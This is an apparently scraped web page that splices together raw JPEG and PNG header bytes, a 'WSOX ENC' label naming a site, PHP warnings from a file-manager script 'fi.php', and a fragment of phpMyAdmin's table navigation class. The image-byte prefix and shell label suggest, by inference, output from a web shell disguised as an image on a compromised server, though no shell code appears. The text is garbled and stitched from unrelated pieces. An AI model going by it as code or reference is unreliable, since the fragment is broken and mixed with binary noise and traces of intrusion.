1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
|null * @psalm-var array{image: string, title: string}|null */ public $secondIcon; /** * Initialises the class * * @param string $name An identifier for the new node * @param int $type Type of node, may be one of CONTAINER or OBJECT * @param bool $isGroup Whether this object has been created * while grouping nodes */ public function __construct($name, $type = Node::OBJECT, $isGroup = false) { parent::__construct($name, $type, $isGroup); $icon = $this->addIcon( Util::getScriptNameForOption($GLOBALS['cfg']['NavigationTreeDefaultTabTable'], 'table') ); if ($icon !== null) { $this->icon = $icon; } $this->secondIcon = $this->addIcon( Util::getScriptNameForOption($GLOBALS['cfg']['NavigationTreeDefaultTabTable2'], 'table') ); $title = (string) Util::getTitleForTarget($GLOBALS['cfg']['DefaultTabTable']); $this->title = $title; $this->links = [ 'text' => [ 'route' => Util::getUrlForOption($GLOBALS['cfg']['DefaultTabTable'], 'table'), 'params' => ['pos' => 0, 'db' => null, 'table' => null], ], 'icon' => [ 'route' => Util::getUrlForOption($GLOBALS['cfg']['NavigationTreeDefaultTabTable'], 'table'), 'params' => ['db' => null, 'table' => null], ], 'second_icon' => [ 'route' => Util::getUrlForOption($GLOBALS['cfg']['NavigationTreeDefaultTabTable2'], 'table'), 'params' => ['db' => null, 'table' => null], ], 'title' => $this->title, ]; $this->classes = 'nav_node_table'; $this->urlParamName = 'table'; } /** * Returns the number of children of type $type present inside this container * This method is overridden by the PhpMyAdmin\Navigation\Nodes\NodeDatabase * and PhpMyAdmin\Navigation\Nodes\NodeTable classes * * @param string $type The type of item we are looking for * ('columns' or 'indexes') * @param string $searchClause A string used to filter the results of the query * * @return int */ public function getPresence($type = '', $searchClause = '') { global $dbi; $retval = 0; $db = $this->realParent()->realName; $table = $this->realName; switch ($type) { case 'columns': if (! $GLOBALS['cfg']['Server']['DisableIS']) { $db = $dbi->escapeString($db); $table = $dbi->escapeString($table); $query = 'SELECT COUNT(*) '; $query .= 'FROM `INFORMATION_SCHEMA`.`COLUMNS` '; $query .= "WHERE `TABLE_NAME`='" . $table . "' "; $query .= "AND `TABLE_SCHEMA`='" . $db . "'"; $retval = (int) $dbi->fetchValue($query); } else { $db = Util::backquote($db); $table = Util::backquote($table); $query = 'SHOW COLUMNS FROM ' . $table . ' FROM ' . $db . ''; $retval = (int) $dbi->queryAndGetNumRows($query); } break; case 'indexes': $db = Util::backquote($db); $table = Util::backquote($table); $query = 'SHOW INDEXES FROM ' . $table . ' FROM ' . $db; $retval = (int) $dbi->queryAndGetNumRows($query); break; case 'triggers': if (! $GLOBALS['cfg']['Server']['DisableIS']) { $db = $dbi->escapeString($db); $table = $dbi->escapeString($table); $query = 'SELECT COUNT(*) '; $query .= 'FROM `INFORMATION_SCHEMA`.`TRIGGERS` '; $query .= 'WHERE `EVENT_OBJECT_SCHEMA` ' . Util::getCollateForIS() . "='" . $db . "' "; $query .= 'AND `EVENT_OBJECT_TABLE` ' . Util::getCollateForIS() . "='" . $table . "'"; $retval = (int) $dbi->fetchValue($query); } else { $db = Util::backquote($db); $table = $dbi->escapeString($table); $query = 'SHOW TRIGGERS FROM ' . $db . " WHERE `Table` = '" . $table . "'"; $retval = (int) $dbi->queryAndGetNumRows($query); } break; default: break; } return $retval; } /** * Returns the names of children of type $type present inside this container * This method is overridden by the PhpMyAdmin\Navigation\Nodes\NodeDatabase * and PhpMyAdmin\Navigation\Nodes\NodeTable classes * * @param string $type The type of item we are looking for * ('tables', 'views', etc) * @param int $pos The offset of the list within the results * @param string $searchClause A string used to filter the results of the query * * @return array */ public function getData($type, $pos, $searchClause = '') { global $dbi; $maxItems = $GLOBALS['cfg']['MaxNavigationItems']; $retval = []; $db = $this->realParent()->realName; $table = $this->realName; switch ($type) { case 'columns': if (! $GLOBALS['cfg']['Server']['DisableIS']) { $db = $dbi->escapeString($db); $table = $dbi->escapeString($table); $query = 'SELECT `COLUMN_NAME` AS `name` '; $query .= ',`COLUMN_KEY` AS `key` '; $query .= ',`DATA_TYPE` AS `type` '; $query .= ',`COLUMN_DEFAULT` AS `default` '; $query .= ",IF (`IS_NULLABLE` = 'NO', '', 'nullable') AS `nullable` "; $query .= 'FROM `INFORMATION_SCHEMA`.`COLUMNS` '; $query .= "WHERE `TABLE_NAME`='" . $table . "' "; $query .= "AND `TABLE_SCHEMA`='" . $db . "' "; $query .= 'ORDER BY `COLUMN_NAME` ASC '; $query .= 'LIMIT ' . intval($pos) . ', ' . $maxItems; $retval = $dbi->fetchResult($query); break; } $db = Util::backquote($db); $table = Util::backquote($table); $query = 'SHOW COLUMNS FROM ' . $table . ' FROM ' . $db; $handle = $dbi->tryQuery($query); if ($handle === false) { break; } $count = 0; if ($handle->seek($pos)) { while ($arr = $handle->fetchAssoc()) { if ($count >= $maxItems) { break; } $retval[] = [ 'name' => $arr['Field'], 'key' => $arr['Key'], 'type' => Util::extractColumnSpec($arr['Type'])['type'], 'default' => $arr['Default'], 'nullable' => ($arr['Null'] === 'NO' ? '' : 'nullable'), ]; $count++; } } break; case 'indexes': $db = Util::backquote($db); $table = Util::backquote($table); $query = 'SHOW INDEXES FROM ' . $table . ' FROM ' . $db; $handle = $dbi->tryQuery($query); if ($handle === false) { break; } $count = 0; foreach ($handle as $arr) { if (in_array($arr['Key_name'], $retval)) { continue; } if ($pos <= 0 && $count < $maxItems) { $retval[] = $arr['Key_name']; $count++; } $pos--; } break; case 'triggers': if (! $GLOBALS['cfg']['Server']['DisableIS']) { $db = $dbi->escapeString($db); $table = $dbi->escapeString($table); $query = 'SELECT `TRIGGER_NAME` AS `name` '; $query .= 'FROM `INFORMATION_SCHEMA`.`TRIGGERS` '; $query .= 'WHERE `EVENT_OBJECT_SCHEMA` ' . Util::getCollateForIS() . "='" . $db . "' "; $query .= 'AND `EVENT_OBJECT_TABLE` ' . Util::getCollateForIS() . "='" . $table . "' "; $query .= 'ORDER BY `TRIGGER_NAME` ASC '; $query .= 'LIMIT ' . intval($pos) . ', ' . $maxItems; $retval = $dbi->fetchResult($query); break; } $db = Util::backquote($db); $table = $dbi->escapeString($table); $query = 'SHOW TRIGGERS FROM ' . $db . " WHERE `Table` = '" . $table . "'"; $handle = $dbi->tryQuery($query); if ($handle === false) { break; } $count = 0; if ($handle->seek($pos)) { while ($arr = $handle->fetchAssoc()) { if ($count >= $maxItems) { break; } $retval[] = $arr['Trigger']; $count++; } } break; default: break; } return $retval; } /** * Returns the type of the item represented by the node. * * @return string type of the item */ protected function getItemType() { return 'table'; } /** * Add an icon to navigation tree * * @param string $page Page name to redirect * * @return array|null * @psalm-return array{image: string, title: string}|null */ private function addIcon(string $page): ?array { if (empty($page)) { return null; } switch ($page) { case Url::getFromRoute('/table/structure'): return ['image' => 'b_props', 'title' => __('Structure')]; case Url::getFromRoute('/table/search'): return ['image' => 'b_search', 'title' => __('Search')]; case Url::getFromRoute('/table/change'): return ['image' => 'b_insrow', 'title' => __('Insert')]; case Url::getFromRoute('/table/sql'): return ['image' => 'b_sql', 'title' => __('SQL')]; case Url::getFromRoute('/sql'): return ['image' => 'b_browse', 'title' => __('Browse')]; } return null; } }